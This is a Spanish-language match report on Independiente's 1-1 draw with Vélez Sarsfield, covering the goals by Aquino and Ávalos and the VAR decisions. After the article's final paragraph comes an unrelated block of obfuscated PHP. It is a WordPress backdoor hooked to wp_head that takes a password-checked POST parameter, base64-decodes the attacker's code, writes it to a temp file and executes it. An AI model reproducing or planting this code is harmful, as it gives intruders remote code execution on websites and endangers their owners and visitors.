Independiente reaccionó en el segundo tiempo y alcanzó un empate ante Vélez Sarsfield

Independiente y Vélez Sarsfield igualaron 1-1, en el estadio Libertadores de América-Ricardo Enrique Bochini, por la tercera fecha del Torneo 2024 de la Liga Profesional. El Fortín, que fue superior en el primer tiempo, ganaba con un gol de Claudio Aquino, de penal; Independiente fue más en el segundo tiempo y festejó el gol de Gabriel Ávalos, de cabeza.

Sorprendió Hugo Tocalli, técnico interino de Independiente tras la salida de Carlos Tevez (mientras Nicolás Larcamón asoma con el principal candidato), con la presencia de tres juveniles como segunda línea de ataque, atrás del referente de área Gabriel Ávalos. Santiago López, el debutante Lautaro Millán y Diego Tarzia también sorprendieron a Vélez en el inicio del partido, dándole fluidez, frescura y dinámica al juego.

Pero duró poco y El Fortín empezó a hacerse fuerte en el mediocampo y a elaborar juego con determinación y precisión. Y a marcar presencia en la ofensiva. Francisco Pizzini aprovechó una mala salida de Independiente y le dio el pase a Braian Romero, quien fue derribado en el área por Damián Pérez.

Claudio Aquino, con pasado en el Rojo y mal recibido por sus hinchas, se hizo cargo del penal. Con un remate bajo mandó la pelota a un rincón; Rodrigo Rey se tiró hacia ese sector pero no pudo frenar el buen disparo, a los 31 minutos.

Cambió el rumbo del partido en el segundo tiempo. Independiente mostró mayor ambición y determinación. Crecieron Federico Mancuello y David Martínez y disminuyeron Agustín Bouzat y Christian Ordoñez (quien saldría lesionado), dándole un giro de noventa grados al control de la zona central. Además, los pibes del Rojo volvieron a mostrarse e influir. Y hubo una cuestión de actitud: a Independiente le sobró y a Vélez le faltó.

Un buen centro de Mauricio Isla al segundo palo fue conectado por Gabriel Ávalos con un frentazo cruzado, que pegó en el palo y entró pese al manotazo de Tomás Marchiori con la pelota apenas traspasando la línea, a los 17 minutos. Para el ex delantero de Argentinos Juniors, que llegó a Avellaneda con sus antecedentes goleadores, significó su segundo tanto en los 19 partidos que lleva en Independiente.

Aunque el Rojo era más y la acción transcurría en la mitad del terreno defensivo visitante, Vélez volvió a golpear en el arco de enfrente. Francisco Pizzini de cabeza le dio el pase a Damián Fernández para que empuje el balón y convierta, a los 23 minutos. El VAR determinó una de esas posiciones adelantadas milimétricas de Pizzini y el gol no fue validado.

Estuvo cerca Independiente del segundo grito. El ingresado Alexis Canelo, por la derecha, dejó en el camino a Marchiori y sacó un remate que cruzó delante de la línea de gol, y un potente cabezazo de Joaquín Laso salió muy cerca del poste, en dos situaciones muy propicias.

Otra acción que generó polémica fue un cruce de Elías Gómez, llegando primero y de lleno a la pelota ante un avance de Santiago López, quien luego cayó tocado por el impulso que llevaba el defensor velezano, en el área, a los 40 minutos. El gesto del árbitro Darío Herrera, con sus manos, fue claro: todo pelota. Desde el VAR le confirmaron que no hubo penal. Más allá de las quejas de Independiente.

    if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}